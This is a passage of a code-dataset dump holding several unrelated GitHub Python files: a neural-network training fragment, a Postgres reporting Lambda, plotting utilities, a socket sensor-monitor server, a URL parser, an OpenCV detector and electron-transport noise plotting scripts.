X_train, X_test, y_train, y_test = achieve_train_test_data(X, Y, train_size=0.9, shuffle=True)\n\n ann = MLP(BATCH_SIZE=20, first_n_pkts=10, epochs=10, num_class=len(Counter(y_train)))\n # training_set = Data.TensorDataset(torch.Tensor(X_train), torch.Tensor(y_train)) # X, Y\n one_hot_y_train = one_hot_sklearn(y_train)\n training_set = (X_train, y_train)\n ann.train(training_set)\n\n # show_figure(ann.train_hist['loss'])\n\n Y_preds = ann.predict(X_train)\n print(Counter(Y_preds))\n acc = ann.evaluate(y_train, Y_preds)\n print('training accuracy:', acc)\n\n Y_preds = ann.predict(X_test)\n print(Counter(Y_preds))\n acc = ann.evaluate(y_test, Y_preds)\n print('testing accuracy:', acc)\n","repo_name":"kun0906/application_classification","sub_path":"histroyFiles/ANN-sklearn.py","file_name":"ANN-sklearn.py","file_ext":"py","file_size_in_byte":9246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19153351842","text":"import datetime\nimport os\n\nimport psycopg2\nimport ujson\n\n\ndef lambda_handler(event: dict, context: object) -> dict:\n result = get_report_for_date_range(\n event[\"queryStringParameters\"][\"date_from\"],\n event[\"queryStringParameters\"][\"date_to\"],\n )\n\n return {\n \"statusCode\": 200,\n \"body\": ujson.dumps(\n [\n {\n \"amount\": amount,\n \"currency\": currency,\n }\n for amount, currency in result\n ]\n ),\n }\n\n\ndef get_report_for_date_range(date_from: datetime.date, date_to: datetime.date) -> list:\n host = os.environ[\"RDS_HOST\"]\n port = os.environ[\"RDS_PORT\"]\n username = os.environ[\"RDS_USERNAME\"]\n password = os.environ[\"RDS_PASSWORD\"]\n\n conn = psycopg2.connect(\n host=host, port=port, database=\"postgres\", user=username, password=password\n )\n\n cursor = conn.cursor()\n cursor.execute(\n \"SELECT SUM(price), currency FROM orders WHERE created_at BETWEEN SYMMETRIC %s AND %s GROUP BY currency\",\n (\n date_from,\n date_to,\n ),\n )\n\n result = cursor.fetchall()\n\n conn.commit()\n cursor.close()\n conn.close()\n\n return result\n","repo_name":"sdarmofal/cloudier","sub_path":"src/reports/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32850189027","text":"import os\nimport numpy as np\nfrom tqdm import tqdm\nfrom scipy.stats import norm\nimport matplotlib.pyplot as plt\n\n\ndef visualize_features(args, nn, layer_names, output_folder):\n dpi = 80.0\n imwidth = 224.0\n\n for layer in args.layers:\n weights, bias = nn.get_layerparams(layer)\n\n inds = range(weights.shape[0])\n nrows = np.ceil(np.sqrt(len(inds)))\n ncols = np.ceil(len(inds) / nrows)\n w = np.ceil((imwidth / dpi) * max(nrows, ncols))\n\n plt.figure(figsize=(w, w))\n for ui in tqdm(range(0, len(inds), 128), desc='Layer ' + layer):\n unitinds = inds[ui:(ui + 128)]\n ims = nn.visualize(None, layer, unitinds)\n ims = ims.transpose(0, 2, 3, 1)\n\n for i in range(ims.shape[0]):\n ax = plt.subplot(nrows, ncols, ui + i + 1)\n im = ims[i]\n im -= im.min()\n im /= im.max()\n\n if not os.path.exists(os.path.join(output_folder, layer_names[layer])):\n os.mkdir(os.path.join(output_folder, layer_names[layer]))\n plt.imsave(os.path.join(output_folder, layer_names[layer], '%04d.png' % (ui + i)), im)\n ax.imshow(im)\n ax.set_xticks([])\n ax.set_yticks([])\n\n plt.tight_layout()\n plt.savefig(os.path.join(output_folder, layer_names[layer] + '.png'))\n plt.close()\n\n\ndef plot_accuracies(filep, accuracies, labels, title, ylabel, xlabel):\n plt.figure()\n\n accuracies_mean = accuracies.mean(0)\n accuracies_std = accuracies.std(0)\n\n plt.plot(accuracies_mean[:, 0], label=labels[0])\n plt.plot(accuracies_mean[:, 1], label=labels[1])\n\n if accuracies.shape[0] > 1:\n plt.fill_between(range(accuracies_mean.shape[0]), accuracies_mean[:, 0] - accuracies_std[:, 0],\n accuracies_mean[:, 0] + accuracies_std[:, 0])\n plt.fill_between(range(accuracies_mean.shape[0]), accuracies_mean[:, 1] - accuracies_std[:, 1],\n accuracies_mean[:, 1] + accuracies_std[:, 1])\n\n # plt.plot((0, accuracies_mean.shape[0]), (accura\n # cies_mean[0, 0], accuracies_mean[0, 0]), 'b--', label='Unlesioned %s recognition'%args.categories[0])\n # plt.plot((0, accuracies_mean.shape[0]), (accuracies_mean[0, 1], accuracies_mean[0, 1]), 'g--', label='Unlesioned %s recognition'%args.categories[1])\n plt.ylabel(ylabel)\n plt.xlabel(xlabel)\n plt.title(title)\n plt.legend()\n plt.savefig(filep)\n plt.close()\n\n\ndef multiplot_accuracies(outputfilep, accuracies_by_experiment, layers, labels, p_threshold=1e-5):\n nexp = len(accuracies_by_experiment)\n nlayers = len(layers[0])\n plt.figure(figsize=(18, (nexp * 18.) / nlayers))\n\n null_hypotheses = {}\n\n for k, accuracies_by_layer in enumerate(accuracies_by_experiment):\n for i, y in enumerate(accuracies_by_layer):\n y = y.squeeze()\n is_nullH = False\n\n if y.ndim == 3:\n y_std = y.std(0)\n y_mean = y.mean(0)\n y = y_mean\n is_nullH = True\n\n null_hypotheses[i] = (y_mean, y_std)\n\n layer = layers[k][i]\n ax = plt.subplot(nexp, 7, k * nlayers + i + 1)\n\n x = np.linspace(0, 1, y.shape[0])\n\n if is_nullH:\n ax.fill_between(x, y[:, 0] - y_std[:, 0], y[:, 0] + y_std[:, 0], alpha=0.5)\n ax.fill_between(x, y[:, 1] - y_std[:, 1], y[:, 1] + y_std[:, 1], alpha=0.5)\n\n plotsA = ax.plot(x, y[:, 0], label=labels[0])\n plotsB = ax.plot(x, y[:, 1], label=labels[1])\n\n # if not is_nullH and null_hypotheses[i] is not None:\n # y_mean, y_std = null_hypotheses[i]\n # ax.plot(x, 1.0 + y[:, 0] - y_mean[:, 0], color=plotsA[0].get_color())\n # ax.plot(x, 1.0 + y[:, 1] - y_mean[:, 1], color=plotsB[0].get_color())\n\n if not is_nullH and null_hypotheses[i] is not None:\n # mark x's that are significantly different from null hypothesis\n y_mean, y_std = null_hypotheses[i]\n pA = norm(y_mean[:, 0], y_std[:, 0]).pdf(y[:, 0])\n pB = norm(y_mean[:, 1], y_std[:, 1]).pdf(y[:, 1])\n\n sigA = pA < p_threshold\n sigB = pB < p_threshold\n\n pointsA = x[sigA]\n pointsB = x[sigB]\n\n ax.plot(pointsA, np.ones((pointsA.shape[0],)) + 0.06, '.', color=plotsA[0].get_color())\n ax.plot(pointsB, np.ones((pointsB.shape[0],)) + 0.03, '.', color=plotsB[0].get_color())\n\n if k == 0:\n plt.title(layer)\n if k < nexp - 1:\n ax.get_xaxis().set_ticks([])\n if i == 0 and k == nexp // 2:\n plt.ylabel('Top-1 Accuracy')\n elif k == nexp - 1 and i == nlayers // 2:\n plt.xlabel('Fraction of features removed')\n if i > 0:\n ax.get_yaxis().set_ticks([])\n if i == nlayers - 1 and k == nexp - 1:\n plt.legend(loc=3)\n plt.tight_layout()\n\n plt.savefig(outputfilep, dpi=300)\n # plt.show()\n plt.close()\n","repo_name":"mlosch/FeatureSharing","sub_path":"featuresharing/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":5192,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"38128154545","text":"import socket\nfrom queue import Queue\nfrom threading import Thread, Lock\nfrom lib.sensor_status import SensorService\n\n\nSEND_REQUEST = \"START_SEND\"\nSTOP_REQUEST = \"STOP_SEND\"\n\nclass ClientMetaInfo:\n def __init__(self, address, queue, id=-1):\n self.address = address\n self.queue = queue\n self.id = id\n\nclass MonitorServer:\n _host = socket.gethostname()\n _port = 2004\n _send_request_lock = Lock()\n \n def __init__(self, sensor_service:SensorService):\n self.sensor_service = sensor_service\n self.list_of_clients = []\n self.monitor_image = open(\"monitor/__demo/empty-image.jpg\", \"rb\").read()\n\n\n def make_request_from_client(self, client_id, request):\n for client in self.list_of_clients:\n if (client.id == client_id):\n if request==SEND_REQUEST: self.stop_all_sending() # TODO Hacky, refactor\n client.queue.put(request)\n \n \n def reset_send_request(self):\n self.send_request_id = -1\n\n\n def multi_threaded_client(self, connection, client_info:ClientMetaInfo):\n connection.send(str.encode('Server is working:'))\n current_status = None\n while True:\n #Check if any messages from app: \n try:\n req = client_info.queue.get_nowait()\n except:\n req = ''\n \n try:\n #Check for data from client\n data = connection.recv(3)\n \n message_type = data.decode('utf-8')\n if(message_type==\"INF\"):\n client_message = connection.recv(500).decode('utf-8')\n # Update the current status\n current_status = self.sensor_service.parse_status(client_message)\n\n elif (message_type==\"IMG\"):\n self.monitor_image = connection.recv(500000)\n \n response = \"OK\"\n if current_status is not None:\n # Bind an id to our meta address\n if client_info.id == -1:\n client_info.id = int(current_status.sensor_id)\n\n # Manage any request to client\n if req != '': \n response = \",\".join([response, req])\n \n connection.sendall(str.encode(response))\n except Exception as e:\n self.sensor_service.reset_status(current_status)\n print(e)\n break\n connection.close()\n\n def run_info_server(self):\n ServerSideSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n ServerSideSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n ThreadCount = 0\n\n try:\n ServerSideSocket.bind((self._host, self._port))\n except socket.error as e:\n exit()\n\n print('Socket is listening..')\n ServerSideSocket.listen(5)\n\n try: \n while True:\n Client, address = ServerSideSocket.accept()\n new_client_queue = Queue(maxsize=5)\n new_client_info = ClientMetaInfo(address, new_client_queue)\n self.list_of_clients.append(new_client_info)\n \n new_thread = Thread(target=self.multi_threaded_client, args=(Client, new_client_info, ))\n ThreadCount += 1\n new_thread.start()\n \n except socket.error as e:\n print(f\"SERVER EXCEPTION : {str(e)}\")\n finally:\n ServerSideSocket.close()\n\n def get_all_sensor_stats(self):\n return self.sensor_service.get_all_sensor_stats()\n \n def get_sensor_stats(self, id):\n return self.sensor_service.get_sensor_stats(id)\n \n def get_monitor_image(self):\n return self.monitor_image\n \n def stop_all_sending(self):\n for client in self.list_of_clients:\n self.make_request_from_client(client.id, STOP_REQUEST)\n\nif __name__ == \"__main__\":\n def test_request(ms):\n import time\n for i in range(10):\n time.sleep(5)\n ms.make_request_from_client(3, STOP_REQUEST)\n ms.make_request_from_client(3, SEND_REQUEST)\n time.sleep(5)\n ms.make_request_from_client(3, STOP_REQUEST)\n\n sensor_service = SensorService()\n ms = MonitorServer(sensor_service)\n test_thread = Thread(target=test_request, args=(ms, ))\n test_thread.start()\n ms.run_info_server()\n ","repo_name":"apajovic/ip_forest_monitor","sub_path":"ForestMonitor/monitor/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22926507335","text":"# encoding: utf-8\n#\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n#\n# Contact: Kyle Lahnakoski (kyle@lahnakoski.com)\n#\n\nfrom mo_dots import Data, Null, coalesce, is_data, is_list, wrap\nfrom mo_future import PY2, is_text, text, unichr, urlparse, is_binary\nfrom mo_json import json2value, value2json\nfrom mo_logs import Log\n\n\nclass URL(object):\n \"\"\"\n JUST LIKE urllib.parse() [1], BUT CAN HANDLE JSON query PARAMETERS\n\n [1] https://docs.python.org/3/library/urllib.parse.html\n \"\"\"\n\n def __new__(cls, value, *args, **kwargs):\n if isinstance(value, URL):\n return value\n else:\n return object.__new__(cls)\n\n def __init__(self, value, port=None, path=None, query=None, fragment=None):\n if isinstance(value, URL):\n return\n try:\n self.scheme = None\n self.host = None\n self.port = port\n self.path = path\n self.query = query\n self.fragment = fragment\n\n if value == None:\n return\n\n if value.startswith(\"file://\") or value.startswith(\"//\"):\n # urlparse DOES NOT WORK IN THESE CASES\n scheme, suffix = value.split(\"//\", 2)\n self.scheme = scheme.rstrip(\":\")\n parse(self, suffix, 0, 1)\n self.query = wrap(url_param2value(self.query))\n else:\n output = urlparse(value)\n self.scheme = output.scheme\n self.port = coalesce(port, output.port)\n self.host = output.netloc.split(\":\")[0]\n self.path = coalesce(path, output.path)\n self.query = coalesce(query, wrap(url_param2value(output.query)))\n self.fragment = coalesce(fragment, output.fragment)\n except Exception as e:\n Log.error(u\"problem parsing {{value}} to URL\", value=value, cause=e)\n\n def __nonzero__(self):\n if self.scheme or self.host or self.port or self.path or self.query or self.fragment:\n return True\n return False\n\n def __bool__(self):\n if self.scheme or self.host or self.port or self.path or self.query or self.fragment:\n return True\n return False\n\n def __truediv__(self, other):\n if not is_text(other):\n Log.error(u\"Expecting text path\")\n output = self.__copy__()\n output.path = output.path.rstrip('/') + \"/\" + other.lstrip('/')\n return output\n\n def __unicode__(self):\n return self.__str__().decode('utf8') # ASSUME chr<128 ARE VALID UNICODE\n\n def __copy__(self):\n output = URL(None)\n output.scheme = self.scheme\n output.host = self.host\n output.port = self.port\n output.path = self.path\n output.query = self.query\n output.fragment = self.fragment\n return output\n\n def decode(self, encoding=''):\n return text(self).decode(encoding)\n\n def __data__(self):\n return str(self)\n\n def __str__(self):\n url = \"\"\n if self.host:\n url = self.host\n if self.scheme:\n url = self.scheme + \"://\"+url\n if self.port:\n url = url + \":\" + str(self.port)\n if self.path:\n if self.path[0] == text(\"/\"):\n url += str(self.path)\n else:\n url += \"/\" + str(self.path)\n if self.query:\n url = url + \"?\" + value2url_param(self.query)\n if self.fragment:\n url = url + \"#\" + value2url_param(self.fragment)\n return url\n\n\ndef int2hex(value, size):\n return ((\"0\" * size) + hex(value)[2:])[-size:]\n\n\ndef hex2chr(hex):\n try:\n return unichr(int(hex, 16))\n except Exception as e:\n raise e\n\nif PY2:\n _map2url = {chr(i): chr(i) for i in range(32, 128)}\n for c in \" {}<>;/?:@&=+$,\":\n _map2url[c] = \"%\" + str(int2hex(ord(c), 2))\n for i in range(128, 256):\n _map2url[chr(i)] = \"%\" + str(int2hex(i, 2))\nelse:\n _map2url = {i: unichr(i) for i in range(32, 128)}\n for c in b\" {}<>;/?:@&=+$,\":\n _map2url[c] = \"%\" + int2hex(c, 2)\n for i in range(128, 256):\n _map2url[i] = \"%\" + str(int2hex(i, 2))\n\n\nnames = [\"path\", \"query\", \"fragment\"]\nindicator = [\"/\", \"?\", \"#\"]\n\n\ndef parse(output, suffix, curr, next):\n if next == len(indicator):\n output.__setattr__(names[curr], suffix)\n return\n\n e = suffix.find(indicator[next])\n if e == -1:\n parse(output, suffix, curr, next + 1)\n else:\n output.__setattr__(names[curr], suffix[:e:])\n parse(output, suffix[e + 1::], next, next + 1)\n\n\ndef url_param2value(param):\n \"\"\"\n CONVERT URL QUERY PARAMETERS INTO DICT\n \"\"\"\n if param == None:\n return Null\n if param == None:\n return Null\n\n def _decode(v):\n output = []\n i = 0\n while i < len(v):\n c = v[i]\n if c == \"%\":\n d = hex2chr(v[i + 1:i + 3])\n output.append(d)\n i += 3\n else:\n output.append(c)\n i += 1\n\n output = text(\"\".join(output))\n try:\n return json2value(output)\n except Exception:\n pass\n return output\n\n query = Data()\n for p in param.split('&'):\n if not p:\n continue\n if p.find(\"=\") == -1:\n k = p\n v = True\n else:\n k, v = p.split(\"=\")\n v = _decode(v)\n\n u = query.get(k)\n if u is None:\n query[k] = v\n elif is_list(u):\n u += [v]\n else:\n query[k] = [u, v]\n\n return query\n\n\ndef value2url_param(value):\n \"\"\"\n :param value:\n :return: ascii URL\n \"\"\"\n if value == None:\n Log.error(\"Can not encode None into a URL\")\n\n if is_data(value):\n value_ = wrap(value)\n output = \"&\".join([\n value2url_param(k) + \"=\" + (value2url_param(v) if is_text(v) else value2url_param(value2json(v)))\n for k, v in value_.leaves()\n ])\n elif is_text(value):\n output = \"\".join(_map2url[c] for c in value.encode('utf8'))\n elif is_binary(value):\n output = \"\".join(_map2url[c] for c in value)\n elif hasattr(value, \"__iter__\"):\n output = \",\".join(value2url_param(v) for v in value)\n else:\n output = str(value)\n return output\n\n\n\n","repo_name":"mozilla/jx-sqlite","sub_path":"vendor/mo_files/url.py","file_name":"url.py","file_ext":"py","file_size_in_byte":6554,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"21"} +{"seq_id":"21305518715","text":"import numpy as np\nimport tensorflow as tf\nimport cv2 as cv\nimport os\nimport argparse\n\nfrom object_detection.utils import label_map_util\n\nCWD_PATH = os.getcwd()\nMODEL_NAME = 'ssd_mobilenet_v1_coco_2017_11_17'\nPATH_TO_FROZEN_GRAPH = os.path.join(CWD_PATH, MODEL_NAME, 'frozen_inference_graph.pb')\nprint('the model:', PATH_TO_FROZEN_GRAPH)\n\n# List of the strings that is used to add correct label for each box.\nPATH_TO_LABELS = os.path.join(CWD_PATH, MODEL_NAME, 'ssd_mobilenet_v1_coco_2017_11_17.pbtxt')\n# PATH_TO_LABELS = os.path.join(CWD_PATH, 'object_detection', 'data','ssd_mobilenet_v1_coco_2017_11_17.pbtxt')\n# print(PATH_TO_LABELS)\n\ncvNet = cv.dnn.readNetFromTensorflow(PATH_TO_FROZEN_GRAPH, PATH_TO_LABELS)\n\n\ndef do_work(image_path):\n # img = cv.imread('images/example1.jpg')\n img = cv.imread(image_path)\n rows = img.shape[0]\n cols = img.shape[1]\n cvNet.setInput(cv.dnn.blobFromImage(img, size=(300, 300), swapRB=True, crop=False))\n cvOut = cvNet.forward()\n\n for detection in cvOut[0,0,:,:]:\n score = float(detection[2])\n if score > 0.3:\n left = detection[3] * cols\n top = detection[4] * rows\n right = detection[5] * cols\n bottom = detection[6] * rows\n cv.rectangle(img, (int(left), int(top)), (int(right), int(bottom)), (23, 230, 210), thickness=2)\n\n cv.imshow('img', img)\n cv.waitKey()\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Detect objects from an image')\n parser.add_argument('--image', metavar='path', required=True,\n help='The image path')\n args = parser.parse_args()\n do_work(args.image)\n\n","repo_name":"paolodoors/face_recognition_ocv","sub_path":"oda2.py","file_name":"oda2.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21940396370","text":"boys = []\ngirls = []\nboy_count = 0\ngirl_count = 0\nwith open('contacts.csv') as file:\n line = file.readline()\n while line:\n if line != '\\n':\n record = line.split(';')\n if record[3].rstrip() == 'M':\n boy_count += 1\n boys.append('\\t' + record[1] + ' ' + record[0])\n if record[3].rstrip() == 'V':\n girl_count += 1\n girls.append('\\t' + record[1] + ' ' + record[0])\n line = file.readline()\ngirls.sort()\nboys.sort()\nprint(girl_count, 'girls:')\nprint(*girls, sep='\\n')\nprint(boy_count, 'boys:')\nprint(*boys, sep='\\n')\n","repo_name":"jnoas123/python","sub_path":"oef text files 7/oef_8.py","file_name":"oef_8.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38575722123","text":"#!/usr/bin/python3\nimport noise_power_v1\nimport pandas as pd\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport os\nimport plotly.offline as py\nimport plotly.graph_objs as go\nimport plotly\nimport constants as c\n\n\ndef velocity_distribution_kde(chi, df,title=[]):\n \"\"\"Takes chi solutions which are already calculated and plots the KDE of the distribution in velocity space\n Parameters:\n chi (nparray): Numpy array containing a solution of the steady Boltzmann equation in chi form.\n df (dataframe): Electron DataFrame indexed by kpt containing the energy associated with each state in eV.\n title (str): String containing the desired name of the plot\n Returns:\n Nothing. Just the plots.\n \"\"\"\n vel = df['vx [m/s]']\n npts = 600 # number of points in the KDE\n vdist = np.zeros(npts)\n vdist_tot = np.zeros(npts)\n vdist_f0 = np.zeros(npts)\n # Need to define the energy range that I'm doing integration over\n # en_axis = np.linspace(enk.min(), enk.min() + 0.4, npts)\n v_ax = np.linspace(vel.min(), vel.max(), npts)\n dx = (v_ax.max() - v_ax.min()) / npts\n f0 = np.squeeze(df['k_FD'].values)\n spread = 22 * dx\n\n def gaussian(x, mu, sigma=spread):\n return (1 / (sigma * np.sqrt(2 * np.pi))) * np.exp((-1 / 2) * ((x - mu) / sigma) ** 2)\n for k in range(len(chi)):\n istart = int(np.maximum(np.floor((vel[k] - v_ax[0]) / dx) - (4 * spread / dx), 0))\n iend = int(np.minimum(np.floor((vel[k] - v_ax[0]) / dx) + (4 * spread / dx), npts - 1))\n vdist_tot[istart:iend] += (chi[k] + f0[k]) * gaussian(v_ax[istart:iend], vel[k])\n vdist_f0[istart:iend] += f0[k] * gaussian(v_ax[istart:iend], vel[k])\n vdist[istart:iend] += chi[k] * gaussian(v_ax[istart:iend], vel[k])\n\n plt.figure()\n ax = plt.axes([0.18, 0.15, 0.76, 0.76])\n ax.plot(v_ax, [0]*len(v_ax), 'k')\n ax.plot(v_ax, vdist_f0, '--', linewidth=2, label='Equilbrium')\n ax.plot(v_ax, vdist_tot, linewidth=2, label='Hot electron distribution')\n # plt.fill(v_ax, vdist, label='non-eq distr', color='red')\n ax.fill(v_ax, vdist, '--', linewidth=2, label='Non-equilibrium deviation', color='C1')\n ax.set_xlabel(r'Velocity [ms$^{-1}$]')\n ax.set_ylabel(r'Occupation [arb.]')\n plt.legend()\n if title:\n plt.title(title)\n\n\ndef plot_vel_KDEs(outLoc,field,df,plotRTA=True,plotLowField=True,plotFDM=True):\n \"\"\"Wrapper script for velocity_distribution_kde. Can do for the various solution schemes saved to file.\n Parameters:\n outLoc (str): String containing the location of the directory to write the chi solutions and ready steady state chis.\n field (dbl): the values of the electric field to be evaluated in V/m.\n df (dataframe): Electron DataFrame indexed by kpt containing the energy associated with each state in eV.\n\n Returns:\n Nothing. Just the plots.\n \"\"\"\n if plotRTA:\n f_i = np.load(outLoc + 'f_1.npy')\n chi_1_i = noise_power_v1.f2chi(f_i,df,field)\n velocity_distribution_kde(chi_1_i, df, title='RTA Chi {:.1e} V/m'.format(field))\n if plotLowField:\n f_i = np.load(outLoc + 'f_2.npy')\n chi_2_i = noise_power_v1.f2chi(f_i,df,field)\n velocity_distribution_kde(chi_2_i, df, title='Low Field Iterative Chi {:.1e} V/m'.format(field))\n if plotFDM:\n chi_3_i = np.load(outLoc + 'chi_3_{:.1e}.npy'.format(field))\n velocity_distribution_kde(chi_3_i, df, title='FDM Iterative Chi {:.1e} V/m'.format(field))\n\n\ndef plot_noise(outLoc,fieldVector,df,plotRTA=True,plotFDM=True):\n \"\"\"Wrapper script for noise_power. Can do for the various solution schemes saved to file.\n Parameters:\n outLoc (str): String containing the location of the directory to write the chi solutions and ready steady state chis.\n fieldVector (nparray): Vector containing the values of the electric field to be evaluated in V/m.\n df (dataframe): Electron DataFrame indexed by kpt containing the energy associated with each state in eV.\n\n Returns:\n Nothing. Just the plots.\n \"\"\"\n noise_1 = []\n noise_3 =[]\n Tn_1 = []\n Tn_3 = []\n\n for ee in fieldVector:\n if plotRTA:\n g_1_i = np.load(outLoc + 'g_1_{:.1e}.npy'.format(ee))\n noise_1.append(noise_power_v1.lowfreq_noise(g_1_i, df))\n f_i = np.load(outLoc + 'f_1.npy')\n mu_1 = noise_power_v1.calc_mobility(f_i,df)\n Tn_1.append(noise_power_v1.noiseT(in_Loc,noise_1[-1], mu_1, df))\n\n if plotFDM:\n g_3_i = np.load(outLoc + 'g_3_{:.1e}.npy'.format(ee))\n noise_3.append(noise_power_v1.lowfreq_noise(g_3_i, df))\n chi_3_i = np.load(outLoc + 'chi_3_{:.1e}.npy'.format(ee))\n mu_3 = (noise_power_v1.calc_diff_mobility(chi_3_i,df,ee))\n Tn_3.append(noise_power_v1.noiseT(in_Loc,noise_3[-1], mu_3, df))\n kvcm = np.array(fieldVector) * 1E-5\n plt.figure()\n if plotRTA:\n g_1_johnson = np.load(outLoc + 'g_1_johnson.npy')\n plt.plot(kvcm, noise_1, linewidth=2, label='RTA')\n plt.axhline(noise_power_v1.lowfreq_noise(g_1_johnson,df), color = 'black',linestyle='--',label='RTA Johnson')\n\n if plotFDM:\n plt.plot(kvcm, noise_3, linewidth=2, label='FDM')\n plt.axhline(noise_3[0], color = 'black',linestyle='--',label='FDM Johnson')\n\n plt.xlabel('Field [kV/cm]')\n plt.ylabel(r'Non-equilibrium diffusion coefficient [m^2/s]')\n plt.legend()\n\n plt.figure()\n if plotRTA:\n plt.plot(kvcm, Tn_1, linewidth=2, label='RTA')\n\n if plotFDM:\n plt.plot(kvcm, Tn_3, linewidth=2, label='FDM')\n\n plt.xlabel('Field [kV/cm]')\n plt.ylabel(r'Noise Temperature [K]')\n plt.legend()\n\n\ndef driftvel_mobility_vs_field(outLoc,df,fieldVector,plotRTA=True,plotLowField=True,plotFDM=True):\n \"\"\"Takes chi solutions which are already calculated and plots drift velocity vs field\n Parameters:\n outLoc (str): String containing the location of the directory to write the chi solutions and ready steady state chis.\n fieldVector (nparray): Vector containing the values of the electric field to be evaluated in V/m.\n df (dataframe): Electron DataFrame indexed by kpt containing the energy associated with each state in eV.\n\n Returns:\n Nothing. Just the plots.\n \"\"\"\n if plotRTA:\n vd_1,meanE_1,n_1,mu_1,ng_1,nl_1 = ([] for i in range(6))\n if plotLowField:\n vd_2,meanE_2,n_2,mu_2,ng_2,nl_2 = ([] for i in range(6))\n if plotFDM:\n vd_3,meanE_3,n_3,mu_3,ng_3,nl_3 = ([] for i in range(6))\n\n for ee in fieldVector:\n if plotRTA:\n f_i = np.load(outLoc + 'f_1.npy')\n chi_1_i = noise_power_v1.f2chi(f_i, df, ee)\n vd_1.append(noise_power_v1.drift_velocity(chi_1_i,df))\n meanE_1.append(noise_power_v1.mean_energy(chi_1_i,df))\n n_1.append(noise_power_v1.calculate_noneq_density(chi_1_i,df))\n mu_1.append(noise_power_v1.calc_mobility(f_i,df)*10**4)\n ng_i,nl_i=noise_power_v1.calc_L_Gamma_pop(chi_1_i,df)\n ng_1.append(ng_i)\n nl_1.append(nl_i)\n if plotLowField:\n f_i = np.load(outLoc + 'f_2.npy')\n chi_2_i = noise_power_v1.f2chi(f_i, df, ee)\n vd_2.append(noise_power_v1.drift_velocity(chi_2_i,df))\n meanE_2.append(noise_power_v1.mean_energy(chi_2_i,df))\n n_2.append(noise_power_v1.calculate_noneq_density(chi_2_i,df))\n mu_2.append(noise_power_v1.calc_mobility(f_i,df)*10**4)\n ng_i,nl_i=noise_power_v1.calc_L_Gamma_pop(chi_2_i,df)\n ng_2.append(ng_i)\n nl_2.append(nl_i)\n if plotFDM:\n chi_3_i = np.load(outLoc + 'chi_3_{:.1e}.npy'.format(ee))\n vd_3.append(noise_power_v1.drift_velocity(chi_3_i,df))\n meanE_3.append(noise_power_v1.mean_energy(chi_3_i,df))\n n_3.append(noise_power_v1.calculate_noneq_density(chi_3_i,df))\n mu_3.append(noise_power_v1.calc_diff_mobility(chi_3_i,df,ee)*10**4)\n ng_i,nl_i=noise_power_v1.calc_L_Gamma_pop(chi_3_i,df)\n ng_3.append(ng_i)\n nl_3.append(nl_i)\n kvcm = np.array(fieldVector) * 1E-5\n plt.figure()\n if plotRTA:\n plt.plot(kvcm, vd_1, 'o-', linewidth=2, label='RTA')\n if plotLowField:\n plt.plot(kvcm, vd_2, linewidth=2, label='Low Field Iterative')\n if plotFDM:\n plt.plot(kvcm, vd_3, linewidth=2, label='FDM Iterative')\n plt.xlabel('Field [kV/cm]')\n plt.ylabel(r'Drift velocity [m/s]')\n plt.legend()\n\n plt.figure()\n if plotRTA:\n plt.plot(kvcm, n_1, 'o-', linewidth=2, label='RTA')\n if plotLowField:\n plt.plot(kvcm, n_2, linewidth=2, label='Low Field Iterative')\n if plotFDM:\n plt.plot(kvcm, n_3, linewidth=2, label='FDM Iterative')\n plt.xlabel('Field [kV/cm]')\n plt.ylabel(r'Carrier population [m^-3]')\n plt.legend()\n\n plt.figure()\n if plotRTA:\n plt.plot(kvcm, meanE_1, 'o-', linewidth=2, label='RTA')\n if plotLowField:\n plt.plot(kvcm, meanE_2, linewidth=2, label='Low Field Iterative')\n if plotFDM:\n plt.plot(kvcm, meanE_3, linewidth=2, label='FDM Iterative')\n plt.xlabel('Field [kV/cm]')\n plt.ylabel(r'Mean energy [eV]')\n plt.legend()\n\n plt.figure()\n if plotRTA:\n plt.plot(kvcm, mu_1, 'o-', linewidth=2, label='RTA')\n if plotLowField:\n plt.plot(kvcm, mu_2, linewidth=2, label='Low Field Iterative')\n if plotFDM:\n plt.plot(kvcm, mu_3, linewidth=2, label='FDM Iterative')\n plt.xlabel('Field [kV/cm]')\n plt.ylabel(r'Mobility [$cm^2 V^{-1} s^{-1}$]')\n plt.legend()\n\n plt.figure()\n if plotRTA:\n plt.plot(kvcm, ng_1, 'o-', linewidth=2, label='RTA Gamma')\n plt.plot(kvcm, nl_1, 'o-', linewidth=2, label='RTA L')\n if plotLowField:\n plt.plot(kvcm, ng_2, linewidth=2, label='Low Field Iterative Gamma')\n plt.plot(kvcm, nl_2, linewidth=2, label='Low Field Iterative L')\n if plotLowField:\n plt.plot(kvcm, ng_3, linewidth=2, label='FDM Iterative Gamma')\n plt.plot(kvcm, nl_3, linewidth=2, label='FDM Iterative L')\n plt.xlabel('Field [kV/cm]')\n plt.ylabel(r'Carrier Population [m^-3]$]')\n plt.legend()\n\n\ndef plot_scattering_rates(inLoc,df,applyscmFac=False):\n \"\"\"Takes chi solutions which are already calculated and plots drift velocity vs field\n Parameters:\n inLoc (str): String containing the location of the directory containing the scattering matrix, assumed simple\n linearization by default.\n df (dataframe): Electron DataFrame indexed by kpt containing the energy associated with each state in eV.\n applyscmFac (bool): Boolean that specifies whether or not to apply the 2*pi squared factor.\n\n 